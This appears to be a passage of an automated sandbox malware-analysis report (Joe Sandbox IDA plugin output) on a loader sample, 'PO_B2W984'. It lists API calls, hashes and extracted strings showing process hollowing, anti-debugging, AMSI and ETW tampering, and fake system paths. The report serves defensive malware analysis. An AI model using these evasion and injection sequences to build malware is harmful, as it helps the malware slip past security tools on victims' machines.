• Opcode Fuzzy Hash: 85cf5070ae57d72509bd3c2c9cd65ae3664227fdf03765c0a2b006a876ddb3ad
• Instruction Fuzzy Hash: 6021D371A407087AEB11EAE4CC46FDE77BDEB08704F500461B605F72D0DAB4AE459B75

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DEE42E
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 79c9513c6019be1243a738b9a3eddf50d0ecc0696bf3d76d7dc9e1bec946c52e
• Instruction ID: a5b30a79dfb73c2906f2c72a587b6824160ba2e84cb30f265b0ac2b1449aaf60
• Opcode Fuzzy Hash: 79c9513c6019be1243a738b9a3eddf50d0ecc0696bf3d76d7dc9e1bec946c52e
• Instruction Fuzzy Hash: 28411A35A50558ABEF11FBA4D881ADEB3FAEF48720F218426E042A7354DA74ED058F74

Control-flow Graph

APIs
  • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 90c7b7a963e013973bec3a57487a7d7ef1d44b45e6bb2f7800f8b9a5a43a8570
• Instruction ID: 8db06daaaa01c2f3cb804d385f00ea11882a6e79082ec748a6fd90ede7ab91ac
• Opcode Fuzzy Hash: 90c7b7a963e013973bec3a57487a7d7ef1d44b45e6bb2f7800f8b9a5a43a8570
• Instruction Fuzzy Hash: D621ED71E40708BAEB20EAE4CD46F9EB7BDEB04B04F504461B605F72D0DBB06E048A65
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DE8660
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: HandleModule$AddressProc$CreateProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 3130163322-2353454454
• Opcode ID: fb649763568dc983fb13f3ffbc2d510655c963c34de717000a7eaf662174e79f
• Instruction ID: 8ca609075dba55c14c531e58cbf607d3f9777bc3c961749e001c6189e486a7e5
• Opcode Fuzzy Hash: fb649763568dc983fb13f3ffbc2d510655c963c34de717000a7eaf662174e79f
• Instruction Fuzzy Hash: 2B11D0B6680648AFEB40EEA8DD41F9A37EDEB0C710F524558BA09D7750C634ED109B74
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: b7cccbac5ec1d6da9274104e022867323c17e0e4c724762bab84e4e0c1dbc841
• Instruction ID: 9f8584056ef580e67d6ece8bfd643acabd6c76d74154acf02eac7eb60c0abecc
• Opcode Fuzzy Hash: b7cccbac5ec1d6da9274104e022867323c17e0e4c724762bab84e4e0c1dbc841
• Instruction Fuzzy Hash: B2112D75644208BFEF00EFA4DC41E9EB7ADEB48710F914464B909DB740DA30AE148B70
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DE7A1F
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
Similarity
• API ID: HandleModule$AddressProc$AllocateMemoryVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ
• API String ID: 4072585319-445027087
• Opcode ID: aaf2052aaad5a96af2c8941dcd61cc679e7df1093f2edd8e9e3404757fcd17c3
• Instruction ID: 5d4511d4fc110432994e11a89754f6743fadb5d51cc02b2671eda57e83c7028c
• Opcode Fuzzy Hash: aaf2052aaad5a96af2c8941dcd61cc679e7df1093f2edd8e9e3404757fcd17c3
• Instruction Fuzzy Hash: 27112D75644208AFEF00EFA4DC41E9EB7ADEB48710F914464B909DB740DA30AE148B70
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE82BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
• Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
Similarity
• API ID: HandleModule$AddressProc$MemoryReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DE7D6C
Similarity
• API ID: HandleModule$AddressProc$MemoryVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW
APIs
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DE8088,?,?,00000000,?,02DE79FE,ntdll,00000000,00000000,02DE7A43,?,?,00000000), ref: 02DE8056
  • Part of subcall function 02DE8018: GetModuleHandleA.KERNELBASE(?), ref: 02DE806A
  • Part of subcall function 02DE80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DE8113
  • Part of subcall function 02DE80C0: GetProcAddress.KERNEL32(?,?), ref: 02DE8125
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02DE8521
Similarity
• API ID: HandleModule$AddressProc$SectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll
APIs
• RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
• NtDeleteFile.NTDLL(?), ref: 02DEDA99
Similarity
• API ID: Path$DeleteFileInitNameName_StringUnicode
• String ID:
APIs
  • Part of subcall function 02DD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02DD4EDA
• RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
• NtDeleteFile.NTDLL(?), ref: 02DEDA99
  • Part of subcall function 02DD4C0C: SysFreeString.OLEAUT32(02DEE948), ref: 02DD4C1A
Similarity
• API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
• String ID:
APIs
  • Part of subcall function 02DE6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02DE6D39,?,?,?,00000000), ref: 02DE6D19
• CoCreateInstance.OLE32(?,00000000,00000005,02DE6E2C,00000000,00000000,02DE6DAB,?,00000000,02DE6E1B), ref: 02DE6D97
Similarity
• API ID: CreateFromInstanceProg
• String ID:
APIs
• InetIsOffline.URL(00000000,00000000,02DFAF99,?,?,?,000002F7,00000000,00000000), ref: 02DEECA6
  • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
  • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
  • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
  • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
  • Part of subcall function 02DEEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02DEEF90,UacInitialize,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString), ref: 02DEEB92
  • Part of subcall function 02DEEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DEEBA4
  • Part of subcall function 02DEEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02DEEBF8
  • Part of subcall function 02DEEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02DEEC0A
  • Part of subcall function 02DEEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02DEEC21
  • Part of subcall function 02DD7E10: GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
  • Part of subcall function 02DDC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F258C8,?,02DEFBF6,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession), ref: 02DDC2FB
  • Part of subcall function 02DEDBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDBE3
  • Part of subcall function 02DEDBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02DEDC78), ref: 02DEDC13
  • Part of subcall function 02DEDBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02DEDC28
                                                                                                                                          • Part of subcall function 02DEDBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02DEDC54
                                                                                                                                          • Part of subcall function 02DEDBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02DEDC5D
                                                                                                                                          • Part of subcall function 02DD7E34: GetFileAttributesA.KERNEL32(00000000,?,02DF2A41,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,Initialize), ref: 02DD7E3F
                                                                                                                                          • Part of subcall function 02DD7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02DF2BDF,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,Initialize,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0), ref: 02DD7FD5
                                                                                                                                          • Part of subcall function 02DEDAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
                                                                                                                                          • Part of subcall function 02DEDAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
                                                                                                                                          • Part of subcall function 02DEDAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
                                                                                                                                          • Part of subcall function 02DEDAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                          • Part of subcall function 02DE8704: LoadLibraryW.KERNEL32(amsi), ref: 02DE870D
                                                                                                                                          • Part of subcall function 02DE8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DE876C
                                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,02DFB328), ref: 02DF49AF
                                                                                                                                          • Part of subcall function 02DEDA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02DEDA64
                                                                                                                                          • Part of subcall function 02DEDA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDAB6), ref: 02DEDA7A
                                                                                                                                          • Part of subcall function 02DEDA3C: NtDeleteFile.NTDLL(?), ref: 02DEDA99
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02DF4BAF
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02DF4C05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                         • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                         • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                        • API String ID: 2010126900-181751239
                                                                                                                                        • Opcode ID: 6f4ce8407f80e37aa3d14da98de72d75bbf316d725a86c00a52e4101f509e7a6
                                                                                                                                        • Instruction ID: e2c33cc865a4e00661cf8a67fe199184ce0a7747ef3b98dbb5709dea40e5cd0f
                                                                                                                                        • Opcode Fuzzy Hash: 6f4ce8407f80e37aa3d14da98de72d75bbf316d725a86c00a52e4101f509e7a6
                                                                                                                                        • Instruction Fuzzy Hash: A4243475A405589FDB61FB64DC80ADE73B6FF84300F1240E6E10AAB758DA70AE85CF64

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DE881C: LoadLibraryA.KERNEL32(00000000,00000000,02DE8903), ref: 02DE8850
                                                                                                                                          • Part of subcall function 02DE881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02DE8903), ref: 02DE8860
                                                                                                                                          • Part of subcall function 02DE881C: GetProcAddress.KERNEL32(74BD0000,00000000), ref: 02DE8879
                                                                                                                                          • Part of subcall function 02DE881C: FreeLibrary.KERNEL32(74BD0000,00000000,02E31388,Function_000065D8,00000004,02E31398,02E31388,000186A3,00000040,02E3139C,74BD0000,00000000,00000000,00000000,00000000,02DE8903), ref: 02DE88E3
                                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F257DC,02F25820,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C), ref: 02DF7E31
                                                                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0), ref: 02DF847B
                                                                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,00000000,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C), ref: 02DF85FA
                                                                                                                                          • Part of subcall function 02DE8798: LoadLibraryW.KERNEL32(bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize,02E313A4,02DEA774,UacScan), ref: 02DE87AC
                                                                                                                                          • Part of subcall function 02DE8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DE87C6
                                                                                                                                          • Part of subcall function 02DE8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000844,00000000,02E313A4,02DEA3BF,ScanString,02E313A4,02DEA774,ScanBuffer,02E313A4,02DEA774,Initialize), ref: 02DE8802
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02E3137C,02DFAFD0,UacInitialize,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,UacScan,02E3137C), ref: 02DF89EC
                                                                                                                                          • Part of subcall function 02DD7E10: GetFileAttributesA.KERNEL32(00000000,?,02DEF8C4,ScanString,02E3137C,02DFAFD0,OpenSession,02E3137C,02DFAFD0,ScanString,02E3137C,02DFAFD0,UacScan,02E3137C,02DFAFD0,UacInitialize), ref: 02DD7E1B
                                                                                                                                          • Part of subcall function 02DEDAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02DEDB96), ref: 02DEDB03
                                                                                                                                          • Part of subcall function 02DEDAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02DEDB3D
                                                                                                                                          • Part of subcall function 02DEDAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02DEDB6A
                                                                                                                                          • Part of subcall function 02DEDAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DEDB73
                                                                                                                                          • Part of subcall function 02DE8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DE820E), ref: 02DE81F0
                                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02E3137C,02DFAFD0,ScanBuffer,02E3137C,02DFAFD0,Initialize,02E3137C,02DFAFD0,00000000,00000000,00000000,ScanString,02E3137C,02DFAFD0), ref: 02DFAA1D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmp
